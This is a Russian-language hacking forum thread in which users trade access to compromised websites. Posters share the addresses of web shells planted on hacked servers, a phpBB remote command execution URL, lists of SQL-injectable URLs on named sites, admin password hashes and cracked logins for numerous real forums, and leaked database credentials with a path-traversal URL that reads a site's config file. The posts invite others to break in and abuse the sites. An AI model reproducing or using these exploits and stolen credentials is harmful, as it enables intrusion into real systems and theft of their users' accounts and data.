• XSS.stack #1 – первый литературный журнал от юзеров форума

Hack Халява

Отслеживать
Админ xirc.ru никак не поменяет пароль с 2004 года как мы сломали icqnet.ru
Gerfaut - rekvin или revkin уже забыл тока что вот проверял но забыл )
Причем пасс у него ко всем аккам\аськам\мылам

Просьба не дефать;)
 
Winux на самом деле не очень хорошо получилось.Мы сделали дамп и на этом успоколились попутно зацепив xirc.ru но без всяких следов\дефейсов
А потом кое кто решил отомстить,точнее помочь другу отомстить и их задефали.Видать им надоели частые взломы вот они и закрылись.Я расшифровал базу на 75 процентов из них 40 процентов я брутил по цифрам.

Есть еще на компе весь дамп старого icqnet а доступ по фтп к новому мы так и не сделали тк сам сайт был криво настроен.

:zns5: Скачать|Download
 
Добрые люди. Предлагаю другое. Мало чего можно сделать через маленькую дырочку в каком-нибудь скрипте. Да и от passwd проку мало.
Заливаем шеллы на похацканные серваки и вылаживаем. Такой халявы даже у xakep.ru нет.

При этом - это самый верный способ отдать сервак на растерзание...

Начну

http://gta-nation.com/pafiledb/uploads/indexx2.php

Кто подкинет еще? Или мне одному так весело?
Кстати травку здесь не курили? :)
 
Ну тогда и от меня подарочек:
http://www.belarusjob.com/viewtopic.php?t=...stem($_GET[id]).%2527&id=uname -a
Сломал когда еще киддисом был, бага до сих пор висит, так что не ругайте сильно за phpBB =))


Я думаю SQL-инъекции тоже мож кому пригодятся =)
Предупреждаю: на валидность не проверял.

  rin.ru
********
http://lib.rin.ru/cgi-bin/search.pl?keyword='&r=
http://lib.rin.ru/cgi-bin/search.pl?r='
http://lib.rin.ru/cgi-bin/new.pl?art='
http://cookbook.rin.ru/cgi-bin/cookbook/se...t='&a=visit
http://socio.rin.ru/cgi-bin/article.pl?id='
http://subscribe.rin.ru/cgi-bin/members.cgi?email=new'
http://map.rin.ru/cgi-bin/main.pl?Region=moscow'
http://map.rin.ru/cgi-bin/res2.pl?Region=m...urs=webcam'
http://connect.rin.ru/cgi-bin/cards.pl?ac=first'   (NOT SQL)

  ЮКОС
******
http://www.yukos.com/ - в посковике


http://hmao.info/news/index.php?id_news='

http://www.kavkazcenter.com/russ/poll_arch...p?poll_id=' /*

Вот еще кое-что (форумы ipb). Давно валяется. На валидность не проверял.

www.blackrose.nl
MEMBER ID : 1
PASSWORD : d2c681e0220d1981ed95e4d1e6693c43

forum.virtualflight.ru
MEMBER ID : 1
PASSWORD : 6b6b6006fb164cc970965bd8bdfe6af4

www.mterra.ru
MEMBER ID : 1
PASSWORD : e0f3b9f500c54f51ecb74095b72174f7



DECRYPTED

www.photo-tourist.com/forum/
topche topsco

www.planete-farcry.net/portail/
Julien_75fr stargate

http://www.ny-host.net/AMH/index.php
Commissaire gaston

http://www.designer.bluehosting.com.br/~de...ts&CODE=leaders
allison allison

http://www.connect.uz/children_forum/index.php
Barmaley 05e7d19a6d002118deef70d21ff4226e energy

http://www.militate.com/site/index.php?
Commander Wolf ef15c9bd4c7836612b1567f4c8396726 blargh

www.clanchatter.com
Clanchat f2a415aa78c7621831da5995e1447242 raymond

www.thpsforums.com/forum/
rockerBOO 570a90bfbf8c7eab5dc5d4e26832d5b1 fred

http://wwwhosts.net/board/index.php
wwwhosts cf1e8c14e54505f60aa10ceb8d5d8ab3 server

http://forum.emotion-hosting.com/index.php?showuser=4
5f4dcc3b5aa765d61d8327deb882cf99 password
 
$INFO['board_url']='http://filezoom.net';
$INFO['sql_database']='zoom';
$INFO['sql_pass']='00000';
$INFO['sql_tbl_prefix'] ='ibf_';
$INFO['sql_user']='x';

Данные БД сайта. подключайтесь, резвитесь;)
Админ сайта извещен о баге, но наверняка не закрыл из-за своей некомпетенции.
Юзаем баг:
http://filezoom.net/index.php?act=module&module=gallery&
cmd=viewimage&img=/../../../conf_global.php&file_type=image/jpeg&tn=1&dir=1123449098/
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх